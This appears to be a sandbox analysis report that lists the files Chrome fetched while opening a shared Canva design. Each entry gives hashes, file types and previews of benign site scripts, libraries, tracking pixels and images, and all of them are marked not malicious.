                                                                                                                                                                                                                                                                    Preview:(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[5069],{../***/ 139504:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);__web_req__(79194);self._45f7853dc7660378a038952b53c0953e = self._45f7853dc7660378a038952b53c0953e || {};(function(__c) {var dj;var B=__c.B;var Xi,Ara,Bra,Dra,Cra,Era,Hra,Fra,fj;Xi=function(a,b,c){return Object.fromEntries(Object.entries("string"===typeof b||"number"===typeof b||"boolean"===typeof b?{default:b}:b).map(([d,e])=>[a[d],c?c(e):e]))};Ara=function({top:a,bottom:b,start:c,end:d}){return[a&&Yi[`${a}BorderTop`],b&&Yi[`${b}BorderBottom`],c&&Yi[`${c}BorderStart`],d&&Yi[`${d}BorderEnd`]]};Bra=function(a,b){return b?"flex"!==a||"start"!==b&&"end"!==b?Zi[`${b}AlignSelf`]:Zi[`${b}FlexAlignSelf`]:null};.Dra=function(a){if(Cra(a))return"_7ukmsg";switch(a){case "fluid":return null;case "content":return"oNSf9w";case "containedContent":return"_3
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):42
                                                                                                                                                                                                                                                                    Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                    MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                    SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                    SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                    SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1303)
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):2229
                                                                                                                                                                                                                                                                    Entropy (8bit):5.623557699395298
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:48:AOAo0AyD7yX0MGbUvn5GbCi4FT+/Z/M9iOMs1VVtCNOQQq9FWXVy3:uzAvPw/ps1TtMou
                                                                                                                                                                                                                                                                    MD5:B852C7982F102B1FA252FC1A2E5F1356
                                                                                                                                                                                                                                                                    SHA1:013E1538DF0E5D3498C4A8FAEEFACA1452CA6A29
                                                                                                                                                                                                                                                                    SHA-256:1A16EFE77C735AE53E59A8736C6114C6ECE373CF94DDD9A87BE91C4FC729DAE4
                                                                                                                                                                                                                                                                    SHA-512:2061288FE6257C97319F49B2EE56F8ED10B7BB3399757D6A3BB9F29E0394DD70DFF5B439340171388C75FABA11B512518DD6492096835D72D06E780BACEC3297
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/f5352d9ab53b693f.js
                                                                                                                                                                                                                                                                    Preview:(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[7045],{../***/ 277425:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);self._45f7853dc7660378a038952b53c0953e = self._45f7853dc7660378a038952b53c0953e || {};(function(__c) {var lPa,mPa;lPa=function(){var a=window;a.addEventListener("dragstart",b=>{null!=b.target&&(b.target instanceof a.HTMLElement&&!1===b.target.draggable||b.target instanceof a.SVGElement)&&(b.preventDefault(),b.stopPropagation())},!0)};mPa=function(a){return a.charAt(0).toUpperCase()+a.slice(1)+"Service"};__c.tz=class extends __c.ae{constructor(a={}){super({...a,statusCode:403});this.name="HttpForbiddenError";Object.setPrototypeOf(this,__c.tz.prototype)}};.__c.uz=class extends __c.ae{constructor(a={}){super({...a,statusCode:404});this.name="HttpNotFoundError";Object.setPrototypeOf(this,__c.uz.prototype)}};__c.vz=class extends __c.ae{constructor
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):2876
                                                                                                                                                                                                                                                                    Entropy (8bit):7.918980525908902
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:48:LPAWxbwpUTulGcXcir/KcWomesWldOt4eK5+gl+FbrypAr/ZpQJ8R+bVDyyzA8/6:T8pAulGeRr/KRomeh3u4B5+xFnypAr/H
                                                                                                                                                                                                                                                                    MD5:6D43F371DEA54A75EF58B07273CC5731
                                                                                                                                                                                                                                                                    SHA1:A081DD92BF966A1154DA867E9F94954823D1394C
                                                                                                                                                                                                                                                                    SHA-256:EA99D0785A80592A159D8DB209CDE0ABDDE69C381902B772A81B7ADBB957F56D
                                                                                                                                                                                                                                                                    SHA-512:67BA77925313B1C83F7D3056ACF1167A5C73DC9A0F24424F4FE2B60AC09543D9FE6794AEE8F839A138F62676BB2CAD642C969201D89B57FC6A8B8BD001377F27
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://media.canva.com/v2/image-resize/format:PNG/height:103/quality:100/uri:s3%3A%2F%2Fmedia-private.canva.com%2F_1h7c%2FMAGXBS_1h7c%2F1%2Fp.png/watermark:F/width:200?csig=AAAAAAAAAAAAAAAAAAAAACnFWDeI2NRpUVeqh9D2x3H-bJYfhhKLTqOrxo_xVEXT&exp=1732129969&osig=AAAAAAAAAAAAAAAAAAAAAOiwISUCqtQIuC3qHQC8BiIppp60e_dvY-XUn7C5tJ71&signer=media-rpc&x-canva-quality=thumbnail
                                                                                                                                                                                                                                                                    Preview:RIFF4...WEBPVP8L'.../......m.z....wDL..M....6..[(#qai....k........m..5.N..2.m[..K..v...v?..dI.M...m.e..{_......{..u.....VuN]..U=.........D.....................aM....0...N...a...Z ..a$..7.......J".?...s.?....x.`.'...b`.v" ..c.V.a..y..~....v.U...9.*..K..L..2c..l..Se..3..4............V..i.+.}.:.>...W.....+.Q=;.~.s..;.>|........r..........)ov.}.V..E_.\....c......D^+MDD..N.UB..rVxy?.....n..U......#.6n...$.:.^...X..Y.....@.........k.$..S..~.....X...Zy.C..7<(.?...m.. .U...z.`@E.\V.?).b}$AR.....P.T.Co.'.....iV!..;...m(.....1gn..B..;.q....<.*.)1N.X...=:>Z...%.%.#l.e.].&...j.;....44.>....q..5.8X....DH'*Pa.J..C..7xz<:::z....<.(..8@..d..A....A.....4.i.7..$....U..T=B.......HI.....g.M.?2+.V0(.iIP$@..E"..Q&C..E<.R....d.H.....|.R....$...(f.Q.M.9q.+s.q).o..&..,..X..'.b%U..4K..E....(W/...s.Y<s.B.?..yD\.".hh..?>..5.B..(..t.LF..E.~(2...D..#r~..S...c&.e.i.hZ%ZV.fV.0.....R.(C.2......-.-.D#.^............h..FN4r.......x........Am.....n...-.....I(... $.0
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (19015)
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):19188
                                                                                                                                                                                                                                                                    Entropy (8bit):5.212814407014048
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:384:+CbuG4xGNoDic2UjKPafxwC5b/4xQviOJU7QzxzivDdE3pcGdjkd/9jt3B+Kb964:zb4xGmiJfaf7gxQvVU7eziv+cSjknZ3f
                                                                                                                                                                                                                                                                    MD5:70D3FDA195602FE8B75E0097EED74DDE
                                                                                                                                                                                                                                                                    SHA1:C3B977AA4B8DFB69D651E07015031D385DED964B
                                                                                                                                                                                                                                                                    SHA-256:A52F7AA54D7BCAAFA056EE0A050262DFC5694AE28DEE8B4CAC3429AF37FF0D66
                                                                                                                                                                                                                                                                    SHA-512:51AFFB5A8CFD2F93B473007F6987B19A0A1A0FB970DDD59EF45BD77A355D82ABBBD60468837A09823496411E797F05B1F962AE93C725ED4C00D514BA40269D14
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js
                                                                                                                                                                                                                                                                    Preview:/*. Copyright (C) Federico Zivolo 2017. Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT).. */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto|scroll)/.test(r+s+p)?e:n(o(e))}function r(e){var o=e&&e.offsetParent,i=o&&o.nodeName;return i&&'BODY'!==i&&'HTML'!==i?-1!==['TD','TABLE'].indexOf(o.nodeName)&&'static'===t(o,'position')?r(o):o:e?e.ownerDocument.documentElement:document.documentElement}functio
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (953)
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):9796
                                                                                                                                                                                                                                                                    Entropy (8bit):5.733929903802842
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:192:F93WtS7Baq9zWOxY6WqZFh7QLAwIQv7rdtT/SPB1jVyIL1My9urqkdR:F9mtS7BafT6WqZkL9jjJZSPB1jVyIurR
                                                                                                                                                                                                                                                                    MD5:B5FB8D5067F40CB9CC45AD4C09F97A47
                                                                                                                                                                                                                                                                    SHA1:DA4A9739D3D463919FD44E01B3891ACC0B01A614
                                                                                                                                                                                                                                                                    SHA-256:1CA6C95281E51C86604E7F879572BCE17DF197F370717A8A568A614F89ECCF56
                                                                                                                                                                                                                                                                    SHA-512:3F42888FC9E2B697DA5AC999A5F7D3EF1EC0514B4748B99D2A57AECED4E4BC33C4746FDAD2D624B99DCC6E4443716A1BABC5A3BA637A918E0A8DE45B06FF157F
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    Preview:(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[6499],{../***/ 293763:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);self._45f7853dc7660378a038952b53c0953e = self._45f7853dc7660378a038952b53c0953e || {};(function(__c) {var t=__c.t;var Mv;var Jv;var Iv;var FLa,Wv,GLa,Xv,ELa,JLa;.__c.Lv=function(a){if(a.match(zLa))return Iv.qk(a);if(a.match(ALa)){var b=ALa.exec(a);if(!b)throw Error(`invalid hexadecimal triplet color: ${a}`);return new Jv(parseInt(b[1]+b[1],16),parseInt(b[2]+b[2],16),parseInt(b[3]+b[3],16))}if(a.match(BLa))return Iv.dW(a);if(a.match(CLa))return Iv.Kda(a);if(a.match(DLa)){b=a.match(DLa);if(!b)throw Error(`invalid hsla color: ${a}`);const [d,e,f]=[b[2],b[4],b[6]];var c=b[8].length?b[8]:"1";a=parseFloat(d)/360;b=parseFloat(e.substring(0,e.length-1))/100;const g=.parseFloat(f.substring(0,f.length-1))/100;c=parseFloat(c);const [h,k,l]=ELa([a,b,g]);
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (5945)
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):317601
                                                                                                                                                                                                                                                                    Entropy (8bit):5.588186370516761
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:6144:f44CMX/iOG9NsPmPzI7BJDMfgQJBCOOWx0/aJQ:Q4n6zsPmcZoC
                                                                                                                                                                                                                                                                    MD5:E673B833354BECB646B8258C5A3BB81C
                                                                                                                                                                                                                                                                    SHA1:F71388D16BA162AA7EF24891BF5BDA9DD5FA3EB4
                                                                                                                                                                                                                                                                    SHA-256:466F760CB15A6A8A4743263281D787245E83706C21B54ED2BAC6CABC905F9CDB
                                                                                                                                                                                                                                                                    SHA-512:6C566461068A526D15947BEA3CE3A2C4915BF88D94CD6EFB3BB11C9FC2227AF281E229708CE47B053FCB63E694445C2DACC34B39267D804FC5B069128DB9CF95
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://www.googletagmanager.com/gtag/js?id=G-EPWEMH6717&l=dataLayer&cx=c&gtm=45He4bj0v812729902za200
                                                                                                                                                                                                                                                                    Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_dma","priority":12,"vtp_delegationMode":"ON","vtp_dmaDefault":"DENIED","tag_id":105},{"function":"__ogt_1p_data_v2","priority":12,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (61332)
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):363712
                                                                                                                                                                                                                                                                    Entropy (8bit):5.419604127334395
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:6144:Cv9rN9OcMgfnTkAp+byndFEASWN19+xSp6rLpsPjw0t6c48FFjhVyupU:CdV19+xSp6r6Pjw0t6R8F5hVyd
                                                                                                                                                                                                                                                                    MD5:3AA70A06F21B7952040B8EB5D42A50BC
                                                                                                                                                                                                                                                                    SHA1:1493C8DCAB48FD136310A72BBDA11358FC53DDD9
                                                                                                                                                                                                                                                                    SHA-256:F3C61904D4ED5866C3B734F212838F84AB0D525E5948EB70FB3946CDF0BF10AA
                                                                                                                                                                                                                                                                    SHA-512:C05F749B0A12E0F9EECDF1D796581B9B066497991071C76685CCA819B681A74C1079DEFE070CAE7DC0FB97DCCFE58D5A81A60394AB4438376B531F73553602B5
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://chunk-composing.canva.com/chunk-batch/d2858d877c79e696.js+6df21c0ad726f56e.vendor.js+d9c3325fa20c5077.js+1af3845752268f2b.js+73112b4e8057cf9b.strings.js+e95df303e00e9086.js+36a39abacef2de2d.js+51a65bea267f0a65.js+4270be5a3621855a.js
                                                                                                                                                                                                                                                                    Preview:;// __FILE_CONTENT_FOR__:d2858d877c79e696.js.(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[3790],{../***/ 228043:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);__web_req__(201099);self._45f7853dc7660378a038952b53c0953e = self._45f7853dc7660378a038952b53c0953e || {};(function(__c) {var bz=__c.bz;var dz=__c.dz;var KVb=__c.Za(()=>({mode:[6,__c.aPa,7,__c.$Oa]}),__c.mz);var LVb=__c.L(()=>({tc:__c.Q("phoneNumber",1),Bc:__c.T("countryCode",2)}));var MVb=__c.L(()=>({...__c.oz(),mode:__c.D("A?",5,"EMAIL_LINK"),email:__c.Q(11)}));var NVb=__c.Za(()=>({mode:[3,__c.hPa,4,__c.pz,5,MVb]}),__c.oz);var OVb=__c.L(()=>({email:__c.Q(1),Od:__c.E(2,__c.hz)}));var cY;.__c.QVb=class{async Z2(a,b){const c=b&&b.N&&this.na&&this.na.If("getauthenticationoptions.http_client",b.N);b=dz(bz([cY,"authentication","options"]));const d={tracing:c&&{N:c},Zc:"getauthenticationoptions"},[e,{E4
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):144
                                                                                                                                                                                                                                                                    Entropy (8bit):4.794095940615871
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:3:PouV7uJzhquHbtt6vYk2ZRMRJfHKERSAEtvxLrXZiLKY8KTZKV8K6c4NGL:hxuJzhqIzyYk+qRU4zEdxXZiqj6K34QL
                                                                                                                                                                                                                                                                    MD5:8B4F126F22721FF58D53EAAD796BD8D9
                                                                                                                                                                                                                                                                    SHA1:951C5F104803E601ECA42601DFECA35EA6AAA4C8
                                                                                                                                                                                                                                                                    SHA-256:37E9E309FD0046D5E8D7E73D0C19215F2B10C1E5C0C74D2FCD3AC7DB9E8C6AFA
                                                                                                                                                                                                                                                                    SHA-512:40CE6DBF7D414A348A104D5F2FD30ABE450F21CDC55927728975478A3C947A65049CC6F9A94CAAC93C3FC42C2A93A67B11A253D3DC642499400E9154588B1E94
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://6aqz4yjq5fbp5equ2o4i3rbsxwj5ecr4j3mtsil7cz3qppu3tlra.ar-io.dev/1.png
                                                                                                                                                                                                                                                                    Preview:<!DOCTYPE html>.<html lang="en">.<head>.<meta charset="utf-8">.<title>Error</title>.</head>.<body>.<pre>Cannot GET /1.png</pre>.</body>.</html>.
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (899)
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):1847
                                                                                                                                                                                                                                                                    Entropy (8bit):5.462497882482417
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:48:ja8b9owcqScFMiwcqScTCa79owcqScFMiwcqScTUdR5:+8b9iSTSt79iSTSi5
                                                                                                                                                                                                                                                                    MD5:F362E3A91F68002DD4855CC21A0D336D
                                                                                                                                                                                                                                                                    SHA1:968D9D02A9773101232C19347FC42542DE2DCB7F
                                                                                                                                                                                                                                                                    SHA-256:9A6AB5DB57FFCB45B9D55DBF15A2293D7E017B93486D602C59C5A115EE6272FF
                                                                                                                                                                                                                                                                    SHA-512:1C7D9848AE6B1B1E746241A7420EA356BDCBAD3738F1C59965F2C72ABBDD19E8DD269D3DE36D9354CA928E38DA01DACD0AFDD6C573A5A9A4B5F35E328961FF7F
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    Preview:event: message.data: {"send_pixel":["https://ad.doubleclick.net/activity;register_conversion=1;src=9812343;type=websi000;cat=flood0;ord=730010551;gtm=45j91e4bi1v872399471z8812729902z9848341198za200zb812729902;dc_pre=1;u59=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGXBQfQ3AM%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink%26utm_source%3Deditor;u67=guest;u66=false;dma=0;npa=0;gcd=13l3l3l3l1l1;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;tag_exp=101925629~102067555~102067808~102077855~102081485;ps=1;pcor=1517773915;s3p=1;~oref=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGXBQfQ3AM%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink%26utm_source%3Deditor?"],"options":{"attribution_reporting":true}}..event: message.data: {"send_pixel":["https://ad.doubleclick.net/activity;src=9812343
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (2884)
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):5461
                                                                                                                                                                                                                                                                    Entropy (8bit):5.7222205790149765
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:96:3uAgW2EPkYLo8EJIRqSrseux9DRH3+TwuxDEfODU0zIelkC0/2L8K7FoGf3Feqgu:3uApOB8JxrrQ9UpxwfEU0EKqq
                                                                                                                                                                                                                                                                    MD5:D258A53D8E3B3337F4AD038BEB8DF26A
                                                                                                                                                                                                                                                                    SHA1:6D0877F1C4E65E998C2274F0968D37D10B9E02AB
                                                                                                                                                                                                                                                                    SHA-256:DD107EF9590C0D60D180F323DECB90CADF375F04975A9C7C5D51A0544A989582
                                                                                                                                                                                                                                                                    SHA-512:ADD01E994258D47E928599C87BA9AD2D57B81F22919AE7D1207B843D27C0453005EF9C37694F9AC13FC35AFF3B41BD2D449B4FF9686D6039EFEC40EECC8CF470
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    Preview:(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[4464],{../***/ 694173:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);__web_req__(9164);__web_req__(277425);__web_req__(201099);self._45f7853dc7660378a038952b53c0953e = self._45f7853dc7660378a038952b53c0953e || {};(function(__c) {var ca=__c.ca;var T=__c.T;var Q=__c.Q;var L=__c.L;var KQa,LQa,hB,PQa,TQa,UQa,XQa;__c.bB=function(a,b){const c=[],d=[];let e=0;for(const f of a)b(f,e)?c.push(f):d.push(f),e++;return[c,d]};__c.cB=function(a){return String(a).padStart(2,"0")};__c.dB=function(a,b,c,d,e){d=new Date(Date.UTC(a,b,null!=c?c:1,d||0,e||0));d.setUTCFullYear(a,b,null!==c&&void 0!==c?c:1);return d};__c.eB=function(a){return a instanceof Date||"number"===typeof a?new Date(a):"string"===typeof a?KQa(a):LQa(a)};.KQa=function(a){var b=a.split("T");a=b[0].split("-").map(Number);b=(b[1]||"").split(":",2).map(c=>Number(c.
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):2312
                                                                                                                                                                                                                                                                    Entropy (8bit):4.096788340259145
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:48:CQuFoaPLZMYWubqPhmsql6p2z9G7O2QBcgHyB/tWav:2lPlbqPYsql0xgGtWA
                                                                                                                                                                                                                                                                    MD5:9ABC2241BF1479263A0A039F3D1E5B5C
                                                                                                                                                                                                                                                                    SHA1:A55CBCE3521486D4C9638602552F1DA877FB5411
                                                                                                                                                                                                                                                                    SHA-256:0145274162A30A4AA4B234015B7FE608367D10F4A8042D30BA995A5ECF1FDCF7
                                                                                                                                                                                                                                                                    SHA-512:0A5B51EEC0171CDDB3B5D9E7F7727D4509F33C63312136CD96A1E29BBC2FA35EFF341AEF41096809D482A16780CC376CAC488C3895E501A10C6FA66F6D8AEBD9
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 36 36"><path fill="#EF9645" d="M32.302 24.347c-.695-1.01-.307-2.47-.48-4.082-.178-2.63-1.308-5.178-3.5-7.216l-7.466-6.942s-1.471-1.369-2.841.103c-1.368 1.471.104 2.84.104 2.84l3.154 2.934 2.734 2.542s-.685.736-3.711-2.078l-10.22-9.506s-1.473-1.368-2.842.104c-1.368 1.471.103 2.84.103 2.84l9.664 8.989c-.021-.02-.731.692-.744.68L5.917 5.938s-1.472-1.369-2.841.103c-1.369 1.472.103 2.84.103 2.84L13.52 18.5c.012.012-.654.764-.634.783l-8.92-8.298s-1.472-1.369-2.841.103c-1.369 1.472.103 2.841.103 2.841l9.484 8.82c.087.081-.5.908-.391 1.009l-6.834-6.356s-1.472-1.369-2.841.104c-1.369 1.472.103 2.841.103 2.841L11.896 30.71c1.861 1.731 3.772 2.607 6.076 2.928.469.065 1.069.065 1.315.096.777.098 1.459.374 2.372.934 1.175.72 2.938 1.02 3.951-.063l3.454-3.695 3.189-3.412c1.012-1.082.831-2.016.049-3.151z"/><path d="M1.956 35.026a.999.999 0 0 1-.707-1.707L4.8 29.77a.999.999 0 1 1 1.414 1.414l-3.551 3.55a.996.996 0 0 1-.707.292zm6.746.922a.999.999 0 0
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (32012)
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):69597
                                                                                                                                                                                                                                                                    Entropy (8bit):5.369216080582935
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:1536:qNhEyjjTikEJO4edXXe9J578go6MWX2xkjVe4c4j2ll2Ac7pK3F71QDU8CuT:Exc2yjq4j2uYnQDU8CuT
                                                                                                                                                                                                                                                                    MD5:5F48FC77CAC90C4778FA24EC9C57F37D
                                                                                                                                                                                                                                                                    SHA1:9E89D1515BC4C371B86F4CB1002FD8E377C1829F
                                                                                                                                                                                                                                                                    SHA-256:9365920887B11B33A3DC4BA28A0F93951F200341263E3B9CEFD384798E4BE398
                                                                                                                                                                                                                                                                    SHA-512:CAB8C4AFA1D8E3A8B7856EE29AE92566D44CEEAD70C8D533F2C98A976D77D0E1D314719B5C6A473789D8C6B21EBB4B89A6B0EC2E1C9C618FB1437EBC77D3A269
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://code.jquery.com/jquery-3.2.1.slim.min.js
                                                                                                                                                                                                                                                                    Preview:/*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other contributors | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_e
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:PNG image data, 1600 x 831, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):57237
                                                                                                                                                                                                                                                                    Entropy (8bit):7.846458290274963
                                                                                                                                                                                                                                                                    Encrypted:false
